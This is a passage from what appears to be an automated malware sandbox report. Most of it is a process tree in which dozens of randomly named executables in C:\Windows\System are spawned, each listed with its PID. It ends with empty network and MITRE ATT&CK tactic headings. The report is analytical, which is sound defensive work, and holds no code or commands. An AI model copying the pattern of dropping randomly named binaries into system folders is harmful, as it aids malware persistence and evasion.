  PID:9068
- C:\Windows\System\yJyfdNm.exe
  C:\Windows\System\yJyfdNm.exe
  2⤵
  PID:9112
- C:\Windows\System\cxNocin.exe
  C:\Windows\System\cxNocin.exe
  2⤵
  PID:9136
- C:\Windows\System\kOwYCZc.exe
  C:\Windows\System\kOwYCZc.exe
  2⤵
  PID:9160
- C:\Windows\System\YrUMinD.exe
  C:\Windows\System\YrUMinD.exe
  2⤵
  PID:9184
- C:\Windows\System\YPWKQzp.exe
  C:\Windows\System\YPWKQzp.exe
  2⤵
  PID:8196
- C:\Windows\System\oJgIObz.exe
  C:\Windows\System\oJgIObz.exe
  2⤵
  PID:8212
- C:\Windows\System\JiNCNlI.exe
  C:\Windows\System\JiNCNlI.exe
  2⤵
  PID:8308
- C:\Windows\System\IHCgouk.exe
  C:\Windows\System\IHCgouk.exe
  2⤵
  PID:8320
- C:\Windows\System\mgBHRAr.exe
  C:\Windows\System\mgBHRAr.exe
  2⤵
  PID:8340
- C:\Windows\System\QtrbYlx.exe
  C:\Windows\System\QtrbYlx.exe
  2⤵
  PID:8444
- C:\Windows\System\IJQYDcL.exe
  C:\Windows\System\IJQYDcL.exe
  2⤵
  PID:8464
- C:\Windows\System\mpSdqKt.exe
  C:\Windows\System\mpSdqKt.exe
  2⤵
  PID:8576
- C:\Windows\System\ePrFwzq.exe
  C:\Windows\System\ePrFwzq.exe
  2⤵
  PID:8628
- C:\Windows\System\idkheyo.exe
  C:\Windows\System\idkheyo.exe
  2⤵
  PID:8680
- C:\Windows\System\SHVZUOW.exe
  C:\Windows\System\SHVZUOW.exe
  2⤵
  PID:8804
- C:\Windows\System\zbneRhT.exe
  C:\Windows\System\zbneRhT.exe
  2⤵
  PID:8876
- C:\Windows\System\EHVxoIU.exe
  C:\Windows\System\EHVxoIU.exe
  2⤵
  PID:8916
- C:\Windows\System\HEDdZLS.exe
  C:\Windows\System\HEDdZLS.exe
  2⤵
  PID:8940
- C:\Windows\System\Cxariqz.exe
  C:\Windows\System\Cxariqz.exe
  2⤵
  PID:9052
- C:\Windows\System\wJPUdKB.exe
  C:\Windows\System\wJPUdKB.exe
  2⤵
  PID:9128
- C:\Windows\System\hurDfBm.exe
  C:\Windows\System\hurDfBm.exe
  2⤵
  PID:9156
- C:\Windows\System\aXrqMnu.exe
  C:\Windows\System\aXrqMnu.exe
  2⤵
  PID:4404
- C:\Windows\System\RBCdCIE.exe
  C:\Windows\System\RBCdCIE.exe
  2⤵
  PID:8336
- C:\Windows\System\pBbOajK.exe
  C:\Windows\System\pBbOajK.exe
  2⤵
  PID:3148
- C:\Windows\System\ypTpbEV.exe
  C:\Windows\System\ypTpbEV.exe
  2⤵
  PID:8548
- C:\Windows\System\WqsYgsQ.exe
  C:\Windows\System\WqsYgsQ.exe
  2⤵
  PID:2772
- C:\Windows\System\FmdRTwS.exe
  C:\Windows\System\FmdRTwS.exe
  2⤵
  PID:8792
- C:\Windows\System\dBkCvmR.exe
  C:\Windows\System\dBkCvmR.exe
  2⤵
  PID:9056
- C:\Windows\System\iOYgUPM.exe
  C:\Windows\System\iOYgUPM.exe
  2⤵
  PID:9208
- C:\Windows\System\DuqjAEu.exe
  C:\Windows\System\DuqjAEu.exe
  2⤵
  PID:8368
- C:\Windows\System\MNXxKxb.exe
  C:\Windows\System\MNXxKxb.exe
  2⤵
  PID:2028
- C:\Windows\System\WVlVSkb.exe
  C:\Windows\System\WVlVSkb.exe
  2⤵
  PID:9084
- C:\Windows\System\WdULzpj.exe
  C:\Windows\System\WdULzpj.exe
  2⤵
  PID:9212
- C:\Windows\System\eHTdIPi.exe
  C:\Windows\System\eHTdIPi.exe
  2⤵
  PID:9240
- C:\Windows\System\DkVkuhf.exe
  C:\Windows\System\DkVkuhf.exe
  2⤵
  PID:9304
- C:\Windows\System\fmfIWgn.exe
  C:\Windows\System\fmfIWgn.exe
  2⤵
  PID:9388
- C:\Windows\System\JIGMZxa.exe
  C:\Windows\System\JIGMZxa.exe
  2⤵
  PID:9404
- C:\Windows\System\OkLPrNU.exe
  C:\Windows\System\OkLPrNU.exe
  2⤵
  PID:9420
- C:\Windows\System\lnCkEml.exe
  C:\Windows\System\lnCkEml.exe
  2⤵
  PID:9436
- C:\Windows\System\HpFmQNc.exe
  C:\Windows\System\HpFmQNc.exe
  2⤵
  PID:9452
- C:\Windows\System\gwquSYZ.exe
  C:\Windows\System\gwquSYZ.exe
  2⤵
  PID:9468
- C:\Windows\System\kIzbKRT.exe
  C:\Windows\System\kIzbKRT.exe
  2⤵
  PID:9484
- C:\Windows\System\dUsFZFW.exe
  C:\Windows\System\dUsFZFW.exe
  2⤵
  PID:9500
- C:\Windows\System\LWcnMvC.exe
  C:\Windows\System\LWcnMvC.exe
  2⤵
  PID:9516
- C:\Windows\System\OABgzvs.exe
  C:\Windows\System\OABgzvs.exe
  2⤵
  PID:9532
- C:\Windows\System\XYeRABv.exe
  C:\Windows\System\XYeRABv.exe
  2⤵
  PID:9556
- C:\Windows\System\utiWCmg.exe
  C:\Windows\System\utiWCmg.exe
  2⤵
  PID:9736
- C:\Windows\System\icyDCzW.exe
  C:\Windows\System\icyDCzW.exe
  2⤵
  PID:9760
- C:\Windows\System\EDUeZxS.exe
  C:\Windows\System\EDUeZxS.exe
  2⤵
  PID:9788
- C:\Windows\System\CJhIVki.exe
  C:\Windows\System\CJhIVki.exe
  2⤵
  PID:9812
- C:\Windows\System\xdQfdJj.exe
  C:\Windows\System\xdQfdJj.exe
  2⤵
  PID:10048
- C:\Windows\System\TaAFBWy.exe
  C:\Windows\System\TaAFBWy.exe
  2⤵
  PID:10064
- C:\Windows\System\SZGPNSw.exe
  C:\Windows\System\SZGPNSw.exe
  2⤵
  PID:10080
- C:\Windows\System\kdGqnpr.exe
  C:\Windows\System\kdGqnpr.exe
  2⤵
  PID:10124
- C:\Windows\System\zzHLtXG.exe
  C:\Windows\System\zzHLtXG.exe
  2⤵
  PID:10140
- C:\Windows\System\swyQsob.exe
  C:\Windows\System\swyQsob.exe
  2⤵
  PID:10172
- C:\Windows\System\zuYDuHs.exe
  C:\Windows\System\zuYDuHs.exe
  2⤵
  PID:10224
- C:\Windows\System\ENEXKGG.exe
  C:\Windows\System\ENEXKGG.exe
  2⤵
  PID:672
- C:\Windows\System\pUlnbqx.exe
  C:\Windows\System\pUlnbqx.exe
  2⤵
  PID:9236
- C:\Windows\System\GwUeyid.exe
  C:\Windows\System\GwUeyid.exe
  2⤵
  PID:4196
- C:\Windows\System\rEVghqC.exe
  C:\Windows\System\rEVghqC.exe
  2⤵
  PID:640
- C:\Windows\System\BjBMYqL.exe
  C:\Windows\System\BjBMYqL.exe
  2⤵
  PID:8788
- C:\Windows\System\iVVwkVy.exe
  C:\Windows\System\iVVwkVy.exe
  2⤵
  PID:9296
- C:\Windows\System\YNJsBfL.exe
  C:\Windows\System\YNJsBfL.exe
  2⤵
  PID:9396
- C:\Windows\System\xgaxhPk.exe
  C:\Windows\System\xgaxhPk.exe
  2⤵
  PID:9340
- C:\Windows\System\CdUxXHB.exe
  C:\Windows\System\CdUxXHB.exe
  2⤵
  PID:9348
- C:\Windows\System\cvMiYhF.exe
  C:\Windows\System\cvMiYhF.exe
  2⤵
  PID:9496
- C:\Windows\System\MGxzegU.exe
  C:\Windows\System\MGxzegU.exe
  2⤵
  PID:4824
- C:\Windows\System\jgNJLJZ.exe
  C:\Windows\System\jgNJLJZ.exe
  2⤵
  PID:9680
- C:\Windows\System\mnkgSiA.exe
  C:\Windows\System\mnkgSiA.exe
  2⤵
  PID:3804
- C:\Windows\System\NpfabLo.exe
  C:\Windows\System\NpfabLo.exe
  2⤵
  PID:9756
- C:\Windows\System\zvpgJNL.exe
  C:\Windows\System\zvpgJNL.exe
  2⤵
  PID:9860
- C:\Windows\System\LUDPSgr.exe
  C:\Windows\System\LUDPSgr.exe
  2⤵
  PID:9884
- C:\Windows\System\iNWeOGN.exe
  C:\Windows\System\iNWeOGN.exe
  2⤵
  PID:9908
- C:\Windows\System\BisRcIX.exe
  C:\Windows\System\BisRcIX.exe
  2⤵
  PID:9940
- C:\Windows\System\YAABeUV.exe
  C:\Windows\System\YAABeUV.exe
  2⤵
  PID:9960
- C:\Windows\System\SHIUykQ.exe
  C:\Windows\System\SHIUykQ.exe
  2⤵
  PID:9996
- C:\Windows\System\AmaBFhI.exe
  C:\Windows\System\AmaBFhI.exe
  2⤵
  PID:10012
- C:\Windows\System\rkhQFCE.exe
  C:\Windows\System\rkhQFCE.exe
  2⤵
  PID:10060
- C:\Windows\System\tFggEMU.exe
  C:\Windows\System\tFggEMU.exe
  2⤵
  PID:4680
- C:\Windows\System\BABkrWb.exe
  C:\Windows\System\BABkrWb.exe
  2⤵
  PID:10132
- C:\Windows\System\WrYxjNR.exe
  C:\Windows\System\WrYxjNR.exe
  2⤵
  PID:10184
- C:\Windows\System\RNaPkeU.exe
  C:\Windows\System\RNaPkeU.exe
  2⤵
  PID:10236
- C:\Windows\System\LJgcKyw.exe
  C:\Windows\System\LJgcKyw.exe
  2⤵
  PID:9460
- C:\Windows\System\mBZIzrA.exe
  C:\Windows\System\mBZIzrA.exe
  2⤵
  PID:2804
- C:\Windows\System\IpIilsx.exe
  C:\Windows\System\IpIilsx.exe
  2⤵
  PID:9572
- C:\Windows\System\ObGvGHb.exe
  C:\Windows\System\ObGvGHb.exe
  2⤵
  PID:9660
- C:\Windows\System\RZcDhZE.exe
  C:\Windows\System\RZcDhZE.exe
  2⤵
  PID:9864
- C:\Windows\System\pqbBSwE.exe
  C:\Windows\System\pqbBSwE.exe
  2⤵
  PID:9920
- C:\Windows\System\MophzzC.exe
  C:\Windows\System\MophzzC.exe
  2⤵
  PID:9972
- C:\Windows\System\GySmFDA.exe
  C:\Windows\System\GySmFDA.exe
  2⤵
  PID:10016
- C:\Windows\System\kFExgML.exe
  C:\Windows\System\kFExgML.exe
  2⤵
  PID:2460
- C:\Windows\System\GWmYakX.exe
  C:\Windows\System\GWmYakX.exe
  2⤵
  PID:9224
- C:\Windows\System\EGhyPAU.exe
  C:\Windows\System\EGhyPAU.exe
  2⤵
  PID:9564
- C:\Windows\System\bNqfezt.exe
  C:\Windows\System\bNqfezt.exe
  2⤵
  PID:9744
- C:\Windows\System\yExJbnc.exe
  C:\Windows\System\yExJbnc.exe
  2⤵
  PID:9876
- C:\Windows\System\UNNyzaj.exe
  C:\Windows\System\UNNyzaj.exe
  2⤵
  PID:9444
- C:\Windows\System\IHhuyFB.exe
  C:\Windows\System\IHhuyFB.exe
  2⤵
  PID:1108
- C:\Windows\System\jIHJtIL.exe
  C:\Windows\System\jIHJtIL.exe
  2⤵
  PID:10076
- C:\Windows\System\sRHXlLG.exe
  C:\Windows\System\sRHXlLG.exe
  2⤵
  PID:10104
- C:\Windows\System\gTTVYmt.exe
  C:\Windows\System\gTTVYmt.exe
  2⤵
  PID:10024
- C:\Windows\System\eHDZfir.exe
  C:\Windows\System\eHDZfir.exe
  2⤵
  PID:10272
- C:\Windows\System\pJOWDLB.exe
  C:\Windows\System\pJOWDLB.exe
  2⤵
  PID:10312
- C:\Windows\System\SQaWXoj.exe
  C:\Windows\System\SQaWXoj.exe
  2⤵
  PID:10332
- C:\Windows\System\xXzZVZB.exe
  C:\Windows\System\xXzZVZB.exe
  2⤵
  PID:10368
- C:\Windows\System\ddQMIKu.exe
  C:\Windows\System\ddQMIKu.exe
  2⤵
  PID:10384
- C:\Windows\System\FuUEOch.exe
  C:\Windows\System\FuUEOch.exe
  2⤵
  PID:10412
- C:\Windows\System\ASlutoJ.exe
  C:\Windows\System\ASlutoJ.exe
  2⤵
  PID:10452
- C:\Windows\System\XnZzDan.exe
  C:\Windows\System\XnZzDan.exe
  2⤵
  PID:10480
- C:\Windows\System\NQIoEQA.exe
  C:\Windows\System\NQIoEQA.exe
  2⤵
  PID:10500
- C:\Windows\System\VNehJbj.exe
  C:\Windows\System\VNehJbj.exe
  2⤵
  PID:10524
- C:\Windows\System\ObwGMEB.exe
  C:\Windows\System\ObwGMEB.exe
  2⤵
  PID:10564
- C:\Windows\System\fhZLXme.exe
  C:\Windows\System\fhZLXme.exe
  2⤵
  PID:10584
- C:\Windows\System\WfKsFjV.exe
  C:\Windows\System\WfKsFjV.exe
  2⤵
  PID:10612
- C:\Windows\System\ccLTjio.exe
  C:\Windows\System\ccLTjio.exe
  2⤵
  PID:10652
- C:\Windows\System\cOZqsYN.exe
  C:\Windows\System\cOZqsYN.exe
  2⤵
  PID:10672
- C:\Windows\System\JWBeqIC.exe
  C:\Windows\System\JWBeqIC.exe
  2⤵
  PID:10696
- C:\Windows\System\gDAcvEA.exe
  C:\Windows\System\gDAcvEA.exe
  2⤵
  PID:10740
- C:\Windows\System\zvpjVgA.exe
  C:\Windows\System\zvpjVgA.exe
  2⤵
  PID:10768
- C:\Windows\System\UztwkPI.exe
  C:\Windows\System\UztwkPI.exe
  2⤵
  PID:10788
- C:\Windows\System\iOXSzLD.exe
  C:\Windows\System\iOXSzLD.exe
  2⤵
  PID:10816
- C:\Windows\System\dwevFbT.exe
  C:\Windows\System\dwevFbT.exe
  2⤵
  PID:10844
- C:\Windows\System\VxmSIbO.exe
  C:\Windows\System\VxmSIbO.exe
  2⤵
  PID:10868
- C:\Windows\System\niKHMMe.exe
  C:\Windows\System\niKHMMe.exe
  2⤵
  PID:10892
- C:\Windows\System\MQKpGMC.exe
  C:\Windows\System\MQKpGMC.exe
  2⤵
  PID:10928
- C:\Windows\System\eObWYaw.exe
  C:\Windows\System\eObWYaw.exe
  2⤵
  PID:10956
- C:\Windows\System\GBULOHd.exe
  C:\Windows\System\GBULOHd.exe
  2⤵
  PID:10976
- C:\Windows\System\bVSBGQh.exe
  C:\Windows\System\bVSBGQh.exe
  2⤵
  PID:11004
- C:\Windows\System\hdZCxif.exe
  C:\Windows\System\hdZCxif.exe
  2⤵
  PID:11028
- C:\Windows\System\dZCDvWi.exe
  C:\Windows\System\dZCDvWi.exe
  2⤵
  PID:11056
- C:\Windows\System\AqxiIwR.exe
  C:\Windows\System\AqxiIwR.exe
  2⤵
  PID:11080
- C:\Windows\System\nNsXwkH.exe
  C:\Windows\System\nNsXwkH.exe
  2⤵
  PID:11116
- C:\Windows\System\OtwYAVv.exe
  C:\Windows\System\OtwYAVv.exe
  2⤵
  PID:11152
- C:\Windows\System\UDZblId.exe
  C:\Windows\System\UDZblId.exe
  2⤵
  PID:11192
- C:\Windows\System\oZaAqLq.exe
  C:\Windows\System\oZaAqLq.exe
  2⤵
  PID:11212
- C:\Windows\System\mshrdBl.exe
  C:\Windows\System\mshrdBl.exe
  2⤵
  PID:11252
- C:\Windows\System\BDyReBz.exe
  C:\Windows\System\BDyReBz.exe
  2⤵
  PID:10260
- C:\Windows\System\WddBgLO.exe
  C:\Windows\System\WddBgLO.exe
  2⤵
  PID:10320
- C:\Windows\System\HNdeURb.exe
  C:\Windows\System\HNdeURb.exe
  2⤵
  PID:10376
- C:\Windows\System\caCfkQa.exe
  C:\Windows\System\caCfkQa.exe
  2⤵
  PID:10400
- C:\Windows\System\tCkYdww.exe
  C:\Windows\System\tCkYdww.exe
  2⤵
  PID:10468
- C:\Windows\System\TZDHjEB.exe
  C:\Windows\System\TZDHjEB.exe
  2⤵
  PID:10596
- C:\Windows\System\XZJIjcJ.exe
  C:\Windows\System\XZJIjcJ.exe
  2⤵
  PID:10680
- C:\Windows\System\gFiNKPY.exe
  C:\Windows\System\gFiNKPY.exe
  2⤵
  PID:10728
- C:\Windows\System\HuLzlhJ.exe
  C:\Windows\System\HuLzlhJ.exe
  2⤵
  PID:10784
- C:\Windows\System\DGJWFys.exe
  C:\Windows\System\DGJWFys.exe
  2⤵
  PID:10808
- C:\Windows\System\oucCInd.exe
  C:\Windows\System\oucCInd.exe
  2⤵
  PID:10864
- C:\Windows\System\CVJWMFp.exe
  C:\Windows\System\CVJWMFp.exe
  2⤵
  PID:10924
- C:\Windows\System\hQSBdYV.exe
  C:\Windows\System\hQSBdYV.exe
  2⤵
  PID:11040
- C:\Windows\System\LALJxZE.exe
  C:\Windows\System\LALJxZE.exe
  2⤵
  PID:11108
- C:\Windows\System\ChnDiHI.exe
  C:\Windows\System\ChnDiHI.exe
  2⤵
  PID:11168
- C:\Windows\System\VLSDjsF.exe
  C:\Windows\System\VLSDjsF.exe
  2⤵
  PID:11176
- C:\Windows\System\klJwQAr.exe
  C:\Windows\System\klJwQAr.exe
  2⤵
  PID:10296
- C:\Windows\System\hOBzTjp.exe
  C:\Windows\System\hOBzTjp.exe
  2⤵
  PID:10444
- C:\Windows\System\QVpPVWW.exe
  C:\Windows\System\QVpPVWW.exe
  2⤵
  PID:10632
- C:\Windows\System\NKQcbBn.exe
  C:\Windows\System\NKQcbBn.exe
  2⤵
  PID:10692
- C:\Windows\System\xinGprc.exe
  C:\Windows\System\xinGprc.exe
  2⤵
  PID:10908
- C:\Windows\System\KAhfocl.exe
  C:\Windows\System\KAhfocl.exe
  2⤵
  PID:10984
- C:\Windows\System\dtZHSXV.exe
  C:\Windows\System\dtZHSXV.exe
  2⤵
  PID:11140
- C:\Windows\System\vNrovac.exe
  C:\Windows\System\vNrovac.exe
  2⤵
  PID:10404
- C:\Windows\System\mghFujD.exe
  C:\Windows\System\mghFujD.exe
  2⤵
  PID:10004
- C:\Windows\System\VzeIExv.exe
  C:\Windows\System\VzeIExv.exe
  2⤵
  PID:11144
- C:\Windows\System\EqDJOwq.exe
  C:\Windows\System\EqDJOwq.exe
  2⤵
  PID:11232
- C:\Windows\System\dFColva.exe
  C:\Windows\System\dFColva.exe
  2⤵
  PID:10604
- C:\Windows\System\uSIbFKB.exe
  C:\Windows\System\uSIbFKB.exe
  2⤵
  PID:11312
- C:\Windows\System\XIdadOa.exe
  C:\Windows\System\XIdadOa.exe
  2⤵
  PID:11332
- C:\Windows\System\LPKWGuC.exe
  C:\Windows\System\LPKWGuC.exe
  2⤵
  PID:11356
- C:\Windows\System\edJwgcJ.exe
  C:\Windows\System\edJwgcJ.exe
  2⤵
  PID:11380
- C:\Windows\System\UMNTOeA.exe
  C:\Windows\System\UMNTOeA.exe
  2⤵
  PID:11408
- C:\Windows\System\gzQyTNG.exe
  C:\Windows\System\gzQyTNG.exe
  2⤵
  PID:11436
- C:\Windows\System\VyOvhfn.exe
  C:\Windows\System\VyOvhfn.exe
  2⤵
  PID:11460
- C:\Windows\System\wLcOWnx.exe
  C:\Windows\System\wLcOWnx.exe
  2⤵
  PID:11488
- C:\Windows\System\IDFnJHT.exe
  C:\Windows\System\IDFnJHT.exe
  2⤵
  PID:11516
- C:\Windows\System\Eqriefg.exe
  C:\Windows\System\Eqriefg.exe
  2⤵
  PID:11544
- C:\Windows\System\KeieeiM.exe
  C:\Windows\System\KeieeiM.exe
  2⤵
  PID:11568
- C:\Windows\System\brOJlRb.exe
  C:\Windows\System\brOJlRb.exe
  2⤵
  PID:11596
- C:\Windows\System\kJYwcTH.exe
  C:\Windows\System\kJYwcTH.exe
  2⤵
  PID:11620
- C:\Windows\System\RaDyuVe.exe
  C:\Windows\System\RaDyuVe.exe
  2⤵
  PID:11644
- C:\Windows\System\YwjWxiQ.exe
  C:\Windows\System\YwjWxiQ.exe
  2⤵
  PID:11668
- C:\Windows\System\UamAQUz.exe
  C:\Windows\System\UamAQUz.exe
  2⤵
  PID:11684
- C:\Windows\System\wUEOAUR.exe
  C:\Windows\System\wUEOAUR.exe
  2⤵
  PID:11728
- C:\Windows\System\RULxWXs.exe
  C:\Windows\System\RULxWXs.exe
  2⤵
  PID:11768
- C:\Windows\System\WTfCJED.exe
  C:\Windows\System\WTfCJED.exe
  2⤵
  PID:11792
- C:\Windows\System\FVHUjdi.exe
  C:\Windows\System\FVHUjdi.exe
  2⤵
  PID:11816
- C:\Windows\System\eIcddDZ.exe
  C:\Windows\System\eIcddDZ.exe
  2⤵
  PID:11864
- C:\Windows\System\FAlbdPR.exe
  C:\Windows\System\FAlbdPR.exe
  2⤵
  PID:11900
- C:\Windows\System\NxiIAwm.exe
  C:\Windows\System\NxiIAwm.exe
  2⤵
  PID:11916
- C:\Windows\System\UZkFjXY.exe
  C:\Windows\System\UZkFjXY.exe
  2⤵
  PID:11932
- C:\Windows\System\MZvrXkT.exe
  C:\Windows\System\MZvrXkT.exe
  2⤵
  PID:11948
- C:\Windows\System\FvHHuGZ.exe
  C:\Windows\System\FvHHuGZ.exe
  2⤵
  PID:11964
- C:\Windows\System\RJDjBoV.exe
  C:\Windows\System\RJDjBoV.exe
  2⤵
  PID:11980
- C:\Windows\System\eQMaxJU.exe
  C:\Windows\System\eQMaxJU.exe
  2⤵
  PID:12060
- C:\Windows\System\aVZzOVh.exe
  C:\Windows\System\aVZzOVh.exe
  2⤵
  PID:12076
- C:\Windows\System\gJzCcXw.exe
  C:\Windows\System\gJzCcXw.exe
  2⤵
  PID:12092
- C:\Windows\System\ajYeLwU.exe
  C:\Windows\System\ajYeLwU.exe
  2⤵
  PID:12108
- C:\Windows\System\hQkYmZA.exe
  C:\Windows\System\hQkYmZA.exe
  2⤵
  PID:12124
- C:\Windows\System\feHxIQv.exe
  C:\Windows\System\feHxIQv.exe
  2⤵
  PID:12140
- C:\Windows\System\PVgifXK.exe
  C:\Windows\System\PVgifXK.exe
  2⤵
  PID:12200
- C:\Windows\System\aqcOCFy.exe
  C:\Windows\System\aqcOCFy.exe
  2⤵
  PID:12216
- C:\Windows\System\ygryrpf.exe
  C:\Windows\System\ygryrpf.exe
  2⤵
  PID:12240
- C:\Windows\System\sjbeUrG.exe
  C:\Windows\System\sjbeUrG.exe
  2⤵
  PID:12260
- C:\Windows\System\YYXafVJ.exe
  C:\Windows\System\YYXafVJ.exe
  2⤵
  PID:12276
- C:\Windows\System\ZOoSiqb.exe
  C:\Windows\System\ZOoSiqb.exe
  2⤵
  PID:11424
- C:\Windows\System\DhoNdCW.exe
  C:\Windows\System\DhoNdCW.exe
  2⤵
  PID:11508
- C:\Windows\System\zaslhaV.exe
  C:\Windows\System\zaslhaV.exe
  2⤵
  PID:11532
- C:\Windows\System\KnZJfcw.exe
  C:\Windows\System\KnZJfcw.exe
  2⤵
  PID:11656
- C:\Windows\System\VKhWCle.exe
  C:\Windows\System\VKhWCle.exe
  2⤵
  PID:11784
- C:\Windows\System\DDuKCOd.exe
  C:\Windows\System\DDuKCOd.exe
  2⤵
  PID:11892
- C:\Windows\System\JjXpNsH.exe
  C:\Windows\System\JjXpNsH.exe
  2⤵
  PID:11912
- C:\Windows\System\sFmooIe.exe
  C:\Windows\System\sFmooIe.exe
  2⤵
  PID:11852
- C:\Windows\System\cGDVOvK.exe
  C:\Windows\System\cGDVOvK.exe
  2⤵
  PID:11876
- C:\Windows\System\jVBUqXD.exe
  C:\Windows\System\jVBUqXD.exe
  2⤵
  PID:3120
- C:\Windows\System\DMysrnH.exe
  C:\Windows\System\DMysrnH.exe
  2⤵
  PID:11328
- C:\Windows\System\KKXwXqe.exe
  C:\Windows\System\KKXwXqe.exe
  2⤵
  PID:12172
- C:\Windows\System\sgDEueG.exe
  C:\Windows\System\sgDEueG.exe
  2⤵
  PID:224
- C:\Windows\System\uIDCDbC.exe
  C:\Windows\System\uIDCDbC.exe
  2⤵
  PID:11636
- C:\Windows\System\keoywYB.exe
  C:\Windows\System\keoywYB.exe
  2⤵
  PID:11496
- C:\Windows\System\oPtqHGL.exe
  C:\Windows\System\oPtqHGL.exe
  2⤵
  PID:11400
- C:\Windows\System\jNxfMxs.exe
  C:\Windows\System\jNxfMxs.exe
  2⤵
  PID:3312
- C:\Windows\System\wObtuvd.exe
  C:\Windows\System\wObtuvd.exe
  2⤵
  PID:11812
- C:\Windows\System\qzYgxsD.exe
  C:\Windows\System\qzYgxsD.exe
  2⤵
  PID:11848
- C:\Windows\System\ZPkIMkV.exe
  C:\Windows\System\ZPkIMkV.exe
  2⤵
  PID:12016
- C:\Windows\System\tRcnrIy.exe
  C:\Windows\System\tRcnrIy.exe
  2⤵
  PID:11996
- C:\Windows\System\MpyGCBA.exe
  C:\Windows\System\MpyGCBA.exe
  2⤵
  PID:12208
- C:\Windows\System\oAKvPgT.exe
  C:\Windows\System\oAKvPgT.exe
  2⤵
  PID:11908
- C:\Windows\System\BXwYHkN.exe
  C:\Windows\System\BXwYHkN.exe
  2⤵
  PID:11992
- C:\Windows\System\NCFRnEi.exe
  C:\Windows\System\NCFRnEi.exe
  2⤵
  PID:12164
- C:\Windows\System\fkJNdqb.exe
  C:\Windows\System\fkJNdqb.exe
  2⤵
  PID:12228
- C:\Windows\System\mJhqSjc.exe
  C:\Windows\System\mJhqSjc.exe
  2⤵
  PID:12308
- C:\Windows\System\pHJXucE.exe
  C:\Windows\System\pHJXucE.exe
  2⤵
  PID:12332
- C:\Windows\System\odejVYw.exe
  C:\Windows\System\odejVYw.exe
  2⤵
  PID:12352
- C:\Windows\System\eUhegYr.exe
  C:\Windows\System\eUhegYr.exe
  2⤵
  PID:12380
- C:\Windows\System\TQdghbb.exe
  C:\Windows\System\TQdghbb.exe
  2⤵
  PID:12408
- C:\Windows\System\eRFxOms.exe
  C:\Windows\System\eRFxOms.exe
  2⤵
  PID:12432
- C:\Windows\System\RduAfGk.exe
  C:\Windows\System\RduAfGk.exe
  2⤵
  PID:12488
- C:\Windows\System\WgQzcdX.exe
  C:\Windows\System\WgQzcdX.exe
  2⤵
  PID:12508
- C:\Windows\System\TWFxmJV.exe
  C:\Windows\System\TWFxmJV.exe
  2⤵
  PID:12540
- C:\Windows\System\sCUAMCX.exe
  C:\Windows\System\sCUAMCX.exe
  2⤵
  PID:12560
- C:\Windows\System\uHywfgD.exe
  C:\Windows\System\uHywfgD.exe
  2⤵
  PID:12580
- C:\Windows\System\EeXXFWR.exe
  C:\Windows\System\EeXXFWR.exe
  2⤵
  PID:12604
- C:\Windows\System\wbYbMsK.exe
  C:\Windows\System\wbYbMsK.exe
  2⤵
  PID:12632
- C:\Windows\System\farMLFY.exe
  C:\Windows\System\farMLFY.exe
  2⤵
  PID:12684
- C:\Windows\System\RzhQVPZ.exe
  C:\Windows\System\RzhQVPZ.exe
  2⤵
  PID:12704
- C:\Windows\System\STavxei.exe
  C:\Windows\System\STavxei.exe
  2⤵
  PID:12748
- C:\Windows\System\ZpePKiC.exe
  C:\Windows\System\ZpePKiC.exe
  2⤵
  PID:12768
- C:\Windows\System\CbsRXul.exe
  C:\Windows\System\CbsRXul.exe
  2⤵
  PID:12808
- C:\Windows\System\HrlpaKU.exe
  C:\Windows\System\HrlpaKU.exe
  2⤵
  PID:12828
- C:\Windows\System\uQGuVUq.exe
  C:\Windows\System\uQGuVUq.exe
  2⤵
  PID:12852
- C:\Windows\System\aIiDfHD.exe
  C:\Windows\System\aIiDfHD.exe
  2⤵
  PID:12872
- C:\Windows\System\rUnVuRe.exe
  C:\Windows\System\rUnVuRe.exe
  2⤵
  PID:12900
- C:\Windows\System\ajfmDxR.exe
  C:\Windows\System\ajfmDxR.exe
  2⤵
  PID:12936
- C:\Windows\System\mnicuht.exe
  C:\Windows\System\mnicuht.exe
  2⤵
  PID:12952
- C:\Windows\System\jtINdvr.exe
  C:\Windows\System\jtINdvr.exe
  2⤵
  PID:12980
- C:\Windows\System\bRIHnXp.exe
  C:\Windows\System\bRIHnXp.exe
  2⤵
  PID:13016
- C:\Windows\System\vllEUHX.exe
  C:\Windows\System\vllEUHX.exe
  2⤵
  PID:13044
- C:\Windows\System\iEkCHKS.exe
  C:\Windows\System\iEkCHKS.exe
  2⤵
  PID:13064
- C:\Windows\System\bafeDwi.exe
  C:\Windows\System\bafeDwi.exe
  2⤵
  PID:13088
- C:\Windows\System\VlcyFXT.exe
  C:\Windows\System\VlcyFXT.exe
  2⤵
  PID:13108
- C:\Windows\System\ykSPHpJ.exe
  C:\Windows\System\ykSPHpJ.exe
  2⤵
  PID:13236
- C:\Windows\System\RsAfsEi.exe
  C:\Windows\System\RsAfsEi.exe
  2⤵
  PID:13264
- C:\Windows\System\sFWnGMi.exe
  C:\Windows\System\sFWnGMi.exe
  2⤵
  PID:13308
- C:\Windows\System\dEYEaTa.exe
  C:\Windows\System\dEYEaTa.exe
  2⤵
  PID:12348
- C:\Windows\System\BhxqYzM.exe
  C:\Windows\System\BhxqYzM.exe
  2⤵
  PID:12448
- C:\Windows\System\vJKeNZm.exe
  C:\Windows\System\vJKeNZm.exe
  2⤵
  PID:12500
- C:\Windows\System\PUmtWrd.exe
  C:\Windows\System\PUmtWrd.exe
  2⤵
  PID:12552
- C:\Windows\System\jNATawp.exe
  C:\Windows\System\jNATawp.exe
  2⤵
  PID:12652
- C:\Windows\System\SduEMdS.exe
  C:\Windows\System\SduEMdS.exe
  2⤵
  PID:12696
- C:\Windows\System\fXoOaaT.exe
  C:\Windows\System\fXoOaaT.exe
  2⤵
  PID:12284
- C:\Windows\System\jdfNMlB.exe
  C:\Windows\System\jdfNMlB.exe
  2⤵
  PID:12836
- C:\Windows\System\DFfdvEP.exe
  C:\Windows\System\DFfdvEP.exe
  2⤵
  PID:12868
- C:\Windows\System\QycrdWU.exe
  C:\Windows\System\QycrdWU.exe
  2⤵
  PID:12924
- C:\Windows\System\JxCkcaG.exe
  C:\Windows\System\JxCkcaG.exe
  2⤵
  PID:13004
- C:\Windows\System\ckdvhnP.exe
  C:\Windows\System\ckdvhnP.exe
  2⤵
  PID:13060
- C:\Windows\System\SoBMzPn.exe
  C:\Windows\System\SoBMzPn.exe
  2⤵
  PID:13148
- C:\Windows\System\dXMWkkR.exe
  C:\Windows\System\dXMWkkR.exe
  2⤵
  PID:12716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

